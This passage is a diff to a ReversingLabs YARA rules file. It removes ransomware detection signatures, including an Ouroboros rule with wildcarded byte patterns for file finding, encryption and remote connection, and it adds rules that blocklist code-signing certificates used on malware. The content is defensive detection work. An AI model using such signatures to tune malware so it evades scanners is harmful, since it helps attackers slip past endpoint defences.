-            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ??
-            ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F
-            84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ??
-            8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74
-            ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ??
-            ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ??
-            ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D
-        }
-		$find_files_p9 = {
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32
-            DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ??
-            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ??
-            F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B
-            01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ??
-            ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ??
-            ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ??
-            8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B
-        }
-		$find_files_p10 = {
-            40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB
-            ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ??
-            75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
-            48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B
-            74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
-            ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1
-            83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9
-            85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88
-            42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF
-            70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D
-            33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83
-            C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89
-            41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ??
-            ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4
-            8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84
-            C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B
-            CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43
-            84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5
-            8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F
-        }
-		$remote_connection_p2 = {
-            1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ??
-            8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45
-            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ??
-            ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85
-            DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6
-            74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56
-            FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures [ i ] . serial == "66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a97723cb-7814-5f08-af94-6244c1cf4145"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13566-L13582"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ouroboros ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af0b9311-a7dd-56e8-a004-0828af5af5ef"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13584-L13600"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433"
+		logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ouroboros"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-        }
-		$remote_connection_p2 = {
-            C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-        }
-		$remote_connection_p3 = {
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF
-            75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83
-            FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ??
-            ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_p4 = {
-            8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF
-            70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F
-            82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
